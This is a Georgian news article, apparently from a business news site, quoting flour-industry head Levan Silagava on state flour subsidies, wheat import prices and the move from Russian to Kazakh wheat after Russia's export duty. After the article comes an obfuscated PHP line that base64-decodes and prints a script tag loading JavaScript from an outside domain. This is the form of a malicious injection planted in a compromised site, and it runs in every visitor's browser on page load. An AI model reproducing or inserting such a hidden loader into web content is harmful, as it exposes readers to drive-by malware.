celsiusi
ავერსი საქკაბელი
“ფქვილის მწარმოებელთა ასოციაციის” ხელმძღვანელი ლევან სილაგავა იმედოვნებს, რომ ხორბლის მოსავლის ფონზე ფასი დაიკლებს და ფქვილზე სახელმწიფო სუფსიდირება საჭირო აღარ იქნება. 
 
სილაგავა განმარტავს, რომ სუფსიდირების პროგრამა დეკემბრის თვეში იმიტომ დაიწყო, რომ გასული წლის სექტემბერში ფასი იყო 200 დოლარი 1  ტონა ხორბლის შემოტანის და უკვე დეკემბერში 250 დოლარი გახდა, შესაბამისად, ფასი იზრდებოდა და იმისათვის, რომ პურის ფასი არ გაზრდილიყო,  იყო საჭიროება  სუფსიდირების პროგრამის. 
 
“ეს იყო ოთხთვიანი პროგრამა დეკემბრიდან მარტის ჩათვლით, ამ პროგრამის მიზანი იყო, რომ ერთი ტომარა ფქვილი პურის ქარხნებისათვის მიწოდებული ყოფილიყო 53 ლარად, იმიტომ რომ პურის მწარმოებელმა ქარხნებმა თქვეს, რომ თუ 53 ლარიანი ფქვილი არ გვექნება, იძულებული გავხდებით გავაძვიროთ პურიო. შესაბამისად, მიღებული იქნა გადაწყვეტილება, რომ დასუფსიდირებულიყო ფქვილის ფასი, ვინაიდან ბაზარზე ფასი იყო უკვე 63 ლარი ერთი ტომარა ფქვილის. აქედან გამომდინარე, ყოველდღიური პურის მწარმოებელ მსხვილ ქარხნებს როგორიცაა იფქლი, დიღმის პური და ა.შ მიეწოდებოდათ 53 ლარად 1 ტომარა ფქვილი. სულ ასეთი იყო 63-მდე ქარხანა. ხოლო პირველი აპრილიდან ამის გაგრძელება იმიტომ გახდა საჭირო, რომ 250 დოლარიდან ხორბლის ფასი ავიდა 280 დოლარამდე, შესაბამისად, ფქვილის ფასი გაიზარდა 68 ლარამდე და რადგან ბუნებრივად ფასმა არ დაიწია, ისევ საჭირო გახდა ამ პროგრამის გაგრძელება კიდევ სამი თვით, ივნისის ჩათვლით”, - განუცხადა სილაგავამ საინფორმაციო სააგენტო BUSINESS TIME-ს. 
 
მისივე თქმით, ამ გამოწვევებს დაემატა ელექტროენერგიის გაძვირება, მათ შორის საწარმო ობიექტებისთვის და ლარის კურსის გაუფასურება.
“ჩვენ ვინაიდან დოლარზე ვყიდულობთ ხორბალს, ამ ყველაფრის გათვალისწინებით მთავრობამ გადაწყვიტა კიდევ სამი თვით გაეგრძელებინა სუფსიდირება. შესაბამისად, შეგვიძლია ვთქვათ, ამ სუფსიდირების ფარგლებში პურის ფასი არ გაიზრდება”- განაცხადა სილაგავამ.
 
BUSINESS TIME-თან საუბარში სილაგავამ განმარტა, რომ 1 ივლისიდან ზოგადად საქართველოშიც და სხვა ქვეყნებშიც საიდანაც ქვეყანა ხორბლით მარაგდება, იწყება ახალი მოსავლის აღება. ტრადიციულად ამ პერიოდში, მოსავლის ფასი აწვება ხორბლის ფასს, რაოდენობრივად ბევრი მოსავალი როცა მოდის ფასი ყოველთვის იკლებს.
 
“ახლა უკვე შეიმჩნევა ტენდენცია, ფასის ძირს წამოსვლის, უკრაინაშიც, რუსეთშიც და სხვა ქვეყნებშიც. აქედან გამომდინარე, იმედი გვაქვს, რომ აღარ დაგვჭირდება სუფსიდირება. ჩვენ ფქვილიც და ხორბალიც ძირითადად შემოგვდის რუსეთიდან, ახლა უკვე დავიწყეთ ყაზახეთიდანაც, ვინაიდან რუსეთმა შემოიღო საექსპორტო საბაჟო გადასახადი, ნოლი ქონდათ და ახლა არის 50 ევრო ერთი ტონის გამოტანაზე. ადრე ყაზახეთი უფრო ძვირი იყო და ახლა რუსეთი გახდა უფრო ძვირი. რუსეთი არა მარტო ჩვენთან ყიდის ხორბალს არამედ მსოფლიოს 136 ქვეყანაში, ყველაზე ერთერთი დიდი მწარმოებელია, შესაბამისად, ჩვენთვის იოლია რუსეთიდან შემოტანა იმიტომ, რომ ახლომდებარეა და ლოჯისტიკური მხარეც ძალიან მარტივია. რუსეთიდან თუ ვთქვათ 20 დოლარი ჯდება გემით შემოტანა ფოთის პორტში, ყაზახეთიდან რკინიგზით ჯდება 80 დოლარი, ერთნაირი ფასის პირობებში 60 დოლარით იაფი გამოდის მხოლოდ შემოტანა რუსეთიდან, მაგრამ ახლა რადგან ტარიფი გაზარდეს 50 ევროთი, რაც 60 დოლარზე მეტია, ამან  საშუალება მისცა ყაზახეთს მისი უფრო ძვირი ხორბალი რუსეთთან შედარებით გაიაფებულიყო  ტრანსპორტირების ჩათვლით. ჩვენ ასევე შემოგვაქვს უნგრული, რუმინული, უკრაინული ხორბალი. ქართული ხორბალიც გვაქვს მაგრამ ეს არის მცირე , მთლიანი მოხმარების 10-12%ია”, - აღნიშნა ლევან სილაგავამ.
 
 
 
1490
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");